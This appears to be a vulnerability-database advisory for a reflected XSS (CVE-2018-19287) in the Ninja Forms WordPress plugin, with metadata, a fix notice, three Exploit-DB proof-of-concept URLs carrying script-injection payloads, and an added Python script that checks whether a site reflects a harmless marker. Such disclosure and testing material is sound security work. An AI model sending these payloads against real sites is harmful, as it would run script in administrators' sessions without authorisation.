Vendor: Ninja Forms
By: MTK
CVSS: 6.1 (MEDIUM)
CWE: 79 (Cross-Site Scripting)
Product Name: Ninja Forms
Affected Version From: Up to V3.3.17
Affected Version To: V3.3.17
Patch Exists: YES
Related CVE: CVE-2018-19287
CPE: a:ninjaforms:ninja_forms:3.3.17
Metasploit:
Other Scripts:
Tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 2, 'verified': True, 'framework': 'wordpress', 'vendor': 'ninjaforma', 'product': 'ninja_forms'}
Platforms Tested: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
Year: 2018

WordPress Plugin Ninja Forms 3.3.17 – Cross-Site Scripting

The WordPress plugin Ninja Forms, up to and including version 3.3.17, is vulnerable to reflected cross-site scripting (XSS) in the submissions listing screen (wp-admin/edit.php with post_type=nf_sub). The begin_date, end_date and form_id filter parameters are echoed into the page without adequate output escaping, so a crafted link can break out of the attribute context and inject markup or script. The victim must be a logged-in WordPress user with access to that screen and must open the attacker's link, which is why the CVSS vector carries PR:N and UI:R. The injected JavaScript then runs in the victim's browser within their wp-admin session and can act with that user's privileges (for example, issuing authenticated requests on their behalf or reading data visible to them); it is script execution in the browser, not arbitrary code execution on the server.

Mitigation:

The vendor has released an updated version of the plugin (V3.3.18) that addresses this vulnerability. It is recommended to update to the latest version to mitigate the risk.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
# Date: 2018-11-15
# Exploit Author: MTK
# Vendor Homepage: https://ninjaforms.com
# Software Link: https://wordpress.org/plugins/ninja-forms/
# Version: Up to V3.3.17
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : CVE-2018-19287

# Plugin description:
# Ninja Forms is the ultimate FREE form creation tool for WordPress. Build forms within minutes 
# using a simple yet powerful drag-and-drop form creator. For beginners, quickly and easily 
# design complex forms with absolutely no code. For developers, utilize built-in hooks, 
# filters, and even custom field templates to do whatever you need at any step in 
# the form building or submission using Ninja Forms as a framework.

# POC

|_1_|

http://127.0.0.1/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date&end_date="><img+src=mtk+onerror=alert(/MTK/);//&filter_action=Filter&paged=1&action2=-1

|_2_|

http://127.0.0.1/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src=mtk+onerror=alert(/MTK/);//&end_date&filter_action=Filter&paged=1&action2=-1

|_3_|

http://127.0.0.1/wp-admin/edit.php?post_status=trash&post_type=nf_sub&form_id=1"><script>alert(/MTK/);</script>&nf_form_filter&paged=1
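The following is an added verification script, not code from the Exploit-DB entry or from the Ninja Forms plugin. It rebuilds the submissions-list filter URL from PoC 1 and injects a harmless attribute-breaking marker (no alert(), no script) into each of the three parameters the PoC targets, then classifies each response as reflecting the marker raw (vulnerable), HTML-encoded (the esc_attr()-style escaping a fixed build produces), or not at all. Assumptions: the marker string, the single query template used for all three parameters (PoC 3 differs slightly, using post_status=trash), the entity form expected from the fix (&quot;, &gt;, &lt;), the constructed sample responses, and that the Cookie header passed on the command line is copied from a logged-in wp-admin session on an instance you are authorised to test.

```python
"""Reflection check for the Ninja Forms <= 3.3.17 submissions-screen XSS (CVE-2018-19287).

Added example, not code from the plugin or the Exploit-DB entry.
"""
import sys
import urllib.parse
import urllib.request

# Parameters the PoC injects into, taken from the three Exploit-DB URLs above.
INJECTABLE_PARAMS = ("begin_date", "end_date", "form_id")

# Constructed probe (assumption): closes a double-quoted attribute and opens a
# tag, but carries no script, so a hit proves the injection without running code.
MARKER = 'nfx"><nfprobe>'
# The same string after esc_attr()/htmlspecialchars(ENT_QUOTES) (assumption:
# a fixed build escapes with entities; add &#34; variants if another encoder is used).
ESCAPED_MARKER = "nfx&quot;&gt;&lt;nfprobe&gt;"


def build_probe_url(base, param, marker=MARKER):
    """Rebuild the submissions-list filter URL from PoC 1 with `marker` in `param`."""
    query = {
        "s": "", "post_status": "all", "post_type": "nf_sub", "action": "-1",
        "form_id": "1", "nf_form_filter": "", "begin_date": "", "end_date": "",
        "filter_action": "Filter", "paged": "1", "action2": "-1",
    }
    if param not in INJECTABLE_PARAMS:
        raise ValueError(f"{param!r} is not one of the PoC parameters")
    query[param] = marker
    return f"{base.rstrip('/')}/wp-admin/edit.php?{urllib.parse.urlencode(query)}"


def classify_reflection(body, marker=MARKER, escaped=ESCAPED_MARKER):
    """'raw' = marker echoed verbatim (vulnerable); 'escaped' = entity-encoded
    (fixed); 'absent' = not reflected, e.g. an unauthenticated redirect to wp-login.php."""
    if marker in body:
        return "raw"
    if escaped in body:
        return "escaped"
    return "absent"


def scan(base, fetch, params=INJECTABLE_PARAMS):
    """Probe each parameter. `fetch(url) -> str` must carry an authenticated
    wp-admin session, because edit.php is not reachable anonymously."""
    return {p: classify_reflection(fetch(build_probe_url(base, p))) for p in params}


# Constructed sample responses (not captured from a real site): the date-filter
# input as a vulnerable build echoes it, and the same fragment after esc_attr().
VULNERABLE_SAMPLE = '<input type="text" name="begin_date" value="nfx"><nfprobe>">'
PATCHED_SAMPLE = '<input type="text" name="begin_date" value="nfx&quot;&gt;&lt;nfprobe&gt;">'


def _http_fetch(cookie_header):
    """Return a fetch() that replays a browser's Cookie header (assumed to be
    copied from a logged-in session, e.g. the wordpress_logged_in_* cookie)."""
    def fetch(url):
        req = urllib.request.Request(url, headers={"Cookie": cookie_header})
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return fetch


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # python nf_probe.py http://127.0.0.1 'wordpress_logged_in_xxx=...'
        for param, verdict in scan(sys.argv[1], _http_fetch(sys.argv[2])).items():
            print(f"{param:10s} {verdict}")
    else:
        # Offline demonstration against the constructed samples.
        print("vulnerable sample:", classify_reflection(VULNERABLE_SAMPLE))
        print("patched sample:   ", classify_reflection(PATCHED_SAMPLE))
```

Run it with no arguments to see the two sample classifications; with a base URL and a session cookie it probes a live instance. A "raw" verdict in an administrator's session is the condition the PoC URLs rely on: from there the attacker only needs that user to open the link, since the reflected value lands inside the filter form's attribute context and any following markup is rendered.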